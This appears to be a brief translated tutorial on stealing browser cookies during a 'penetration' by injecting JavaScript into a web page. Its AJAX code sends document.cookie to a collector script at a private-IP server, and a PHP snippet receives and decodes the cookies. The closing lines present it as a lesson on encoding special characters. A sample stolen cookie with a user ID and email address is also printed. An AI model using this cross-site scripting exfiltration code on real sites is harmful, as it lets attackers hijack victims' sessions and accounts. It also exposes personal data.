During the penetration process, you can insert JS code into the web page to obtain cookie: document.cookie
So how to transfer the obtained cookie What about our own server?
Here, I am using AJAX technology. But Ajax has a cross-domain problem, so it needs to be set in the http header. Here we mainly talk about the submission of cookie.
Let’s look at a piece of JScode first:
xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+document. cookie,true);
Here, the cookie obtained from the webpage is submitted to receiveCookie.php, where part of the cookie looks like this:
ULV =1450275143055:1:1:1:182.138.174.191_1450275139.121259:;SGUID=1450275146558_35957829; vjuids=-37098b091.151ab228f90.0.920dc7c7;vjlast =1450275148;SUP=cv%3D1%26bt%3D1450275168%26et%3D1450361568%26d %3D40c3%26i%3D2611%26us%3D1%26vf%3D0%26vt%3D0%26ac%3D2%26st%3D0%26lt%3D1%26uid%3D2277147785%26user%3D493354115%2540qq.com%26ag%3D4%2 6name%3D493354115 %2540qq.com%26nick%3D%25E7%25BB%25BF%25E8%258C%25B66888%26sex%3D1%26ps%3D0%26email%3D%26dob%3D%26ln%3D493354115%2540qq.com%26os%3D%26fmp %3D%26lcp%3D;SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5o5Vidv35CH47We9hTzl.1; ALF=1481811169;
If special characters "%", "&", etc. are encountered during the submission process, they will be automatically parsed, resulting in parameter transmission errors.
The solution is:
var cookie = document.cookie;
cookie = escape(encodeURIComponent(cookie));
xmlhttp.open("GET","http://192.168 .17.63/HelloPhp/receiveCookie.php?cookie="+cookie,true);
Receive it at receiveCookie.php:
$cookie = $_GET["cookie" ];
$cookie = (urldecode($cookie));
The above introduces the method of submitting parameters containing special characters in Php, including the relevant content. I hope it will be helpful to friends who are interested in PHP tutorials.